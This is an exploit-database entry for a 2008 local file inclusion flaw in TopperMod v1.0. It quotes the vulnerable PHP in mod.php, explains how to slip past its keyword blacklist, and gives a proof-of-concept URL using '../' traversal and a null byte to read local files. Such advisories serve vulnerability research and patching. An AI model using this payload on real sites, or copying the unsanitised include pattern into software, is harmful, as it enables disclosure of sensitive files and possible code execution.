header-logo
Suggest Exploit
vendor:
TopperMod
by:
GiReX
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: TopperMod
Affected Version From: TopperMod v1.0
Affected Version To: TopperMod v1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TopperMod v1.0 Local File Inclusion

TopperMod v1.0 is vulnerable to Local File Inclusion. The vulnerability exists due to the lack of sanitization of the 'to' parameter in the 'mod.php' script. An attacker can exploit this vulnerability to include arbitrary local files, leading to the disclosure of sensitive information and/or the execution of arbitrary code.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

# Author:	__GiReX__
# mySite:	girex.altervista.org

# CMS: 		TopperMod v1.0
# Site:		rtcw.ch/mio/index.php

# Bug: 		Local File Inclusion
# File: 	mod.php
# Var :		$to


# Bug explanation - Vuln Code:

	if (isset($_GET['mod'])) { $mod = stripslashes($_GET['mod']); } else { header("location index.php"); Die(); }
	if (isset($_GET['to'])) { $to = stripslashes($_GET['to']); } else { $to="index"; }

# Our bugged vars are GET's var so we don't need Register_Globals turned On
 
 
	$vietate=array("http","select","union","where","delete","insert","alert","document");
		if (ereg($vietate,strtolower($mod)) OR ereg($vietate,strtolower($to)) ) { 
	 		echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
		} elseif (ereg("[a-zA-Z0-9]",$mod) OR ereg("[a-zA-Z0-9]",$to)) {

# Our exploitation don't use a $vietate word and
# the check of ereg() return true if we use some letters


  ...
# ... we must be logged in and $mod must be a real section
  ...


	if (file_exists("mod/$mod/".$to.".php") ) {
		include("mod/$mod/".$to.".php");
	} else {
		echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
				}

# var $to is not sanizated so we can exploit thought Local File Inclusion


PoC:  [host]/[path]/mod.php?mod=account&to=../../[local file]%00

# milw0rm.com [2008-03-25]